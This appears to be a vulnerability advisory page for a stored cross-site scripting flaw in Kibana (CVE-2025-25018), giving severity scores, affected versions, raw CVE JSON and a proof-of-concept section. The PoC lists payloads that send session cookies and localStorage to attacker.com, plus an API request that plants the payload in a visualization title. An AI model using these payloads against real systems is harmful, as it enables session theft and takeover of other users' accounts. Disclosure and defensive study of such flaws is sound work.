Security Vulnerability Report
CVE-2025-25018 CVSS 8.7 HIGH

Published: 2025-10-10 10:15:34
Last Modified: 2025-10-30 14:25:56

Description

Improper Neutralization of Input During Web Page Generation in Kibana can lead to stored Cross-Site Scripting (XSS)

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE: Kibana < 8.18.8
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE: Kibana 8.19.x < 8.19.5
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE: Kibana 9.0.x < 9.0.8
cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE: Kibana 9.1.x < 9.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
<!--
CVE-2025-25018 - Kibana Stored XSS PoC
Vulnerability: Improper Neutralization of Input During Web Page Generation
Tested on Kibana versions prior to 8.18.8, 8.19.5, 9.0.8, 9.1.5
-->

// Step 1: Attacker logs into Kibana with low-privilege account
// Step 2: Inject malicious payload into a vulnerable input field
// Example payload for visualization title or dashboard description:
var maliciousPayload = '<img src=x onerror="fetch(\'http://attacker.com/steal?cookie=\'+document.cookie)">';

// Alternative payloads:
var payload2 = '<svg onload="javascript:fetch(\'http://attacker.com/exfil\',{method:\'POST\',body:JSON.stringify({cookies:document.cookie,localStorage:JSON.stringify(localStorage)})})">';

// Step 3: Submit the data through Kibana API
// Example: Create or update a visualization with malicious title
POST /api/saved_objects/visualization/<viz-id>
Content-Type: application/json

{
  "attributes": {
    "title": "<img src=x onerror=\"fetch('http://attacker.com/steal?c='+document.cookie)\">",
    "description": "Legitimate description",
    "visState": "{}",
    "kibanaSavedObjectMeta": {
      "searchSourceJSON": "{}"
    }
  }
}

// Step 4: When a higher-privileged user views the dashboard,
// the malicious script executes in their browser context
// and exfiltrates sensitive data to the attacker's server.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-25018", "sourceIdentifier": "[email protected]", "published": "2025-10-10T10:15:33.743", "lastModified": "2025-10-30T14:25:55.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation in Kibana can lead to stored Cross-Site Scripting (XSS)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "8.18.8", "matchCriteriaId": "DC3153A3-2F19-4238-9365-62F1CEB5BB09"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.19.0", "versionEndExcluding": "8.19.5", "matchCriteriaId": "78D0ADE9-3399-4D46-A5C0-45D6B1FF19F0"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.8", "matchCriteriaId": "A5D3776F-14E6-48FF-9D0B-67A772CD2D98"}, {"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.1.0", "versionEndExcluding": "9.1.5", "matchCriteriaId": "080EA14F-4F54-43C6-972C-18A40C255928"}]}]}], "references": [{"url": "https://https://discuss.elastic.co/t/kibana-8-18-8-8-19-5-9-0-8-9-1-5-security-update-esa-2025-17/382451", "source": "[email protected]", "tags": ["Broken Link", "Vendor Advisory"]}]}}